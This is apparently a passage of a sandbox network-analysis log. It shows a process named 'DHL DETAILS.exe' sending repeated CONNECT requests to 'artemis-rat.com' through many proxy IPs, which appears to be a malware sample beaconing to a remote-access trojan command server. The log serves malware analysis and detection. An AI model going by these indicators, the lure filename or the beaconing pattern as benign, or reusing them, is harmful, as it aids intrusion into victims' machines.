                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1355192.168.2.553856105.112.140.21880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.634021997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.567538023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.868460894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.270833969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1356192.168.2.553974218.252.244.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.634371996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1357192.168.2.55396614.103.24.2080006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.642450094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1358192.168.2.554041192.154.246.9690006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.642540932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1359192.168.2.554048162.159.250.145806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.642914057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.805310965 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1360192.168.2.55400294.23.220.136195476352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.643151999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.333197117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.333367109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1361192.168.2.554063172.67.14.237806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.643379927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.798046112 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1362192.168.2.5526568.242.85.69996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.643934011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833118916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1363192.168.2.554049104.20.125.124806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.644512892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.798959017 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1364192.168.2.553980213.149.154.21356786352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.644625902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1365192.168.2.5539648.219.179.237156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.644977093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1366192.168.2.553943202.150.1.87806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.644979000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1367192.168.2.553998185.110.190.99806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.645360947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1368192.168.2.554019193.84.89.20284436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.645457983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.333249092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1369192.168.2.553942103.231.78.36806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.645561934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1370192.168.2.553994193.136.97.17806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.648680925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.993920088 CET806INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Server: Apache/2.4.56 (Debian)
                                                                                    Content-Length: 614
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.56 (Debian) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1371192.168.2.55259345.81.232.17615536352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.648806095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833120108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1372192.168.2.554151211.234.125.54436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.649441004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1373192.168.2.55346451.75.125.208481146352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.651556015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833200932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.833262920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.834048033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1374192.168.2.553929115.244.127.160806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.651561975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1375192.168.2.554154211.234.125.54436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.654069901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1376192.168.2.554162211.234.125.54436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.655529976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1377192.168.2.5540208.213.128.6500016352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.661803961 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1378192.168.2.554023122.51.123.219806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.663242102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1379192.168.2.554021194.247.173.1780806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.664515972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1380192.168.2.554090185.162.229.70806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.673571110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.828041077 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1381192.168.2.554109104.18.20.160806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:18.680442095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.836627960 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:18 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1382192.168.2.552672103.113.71.23031286352C:\Users\user\Desktop\DHL DETAILS.exe
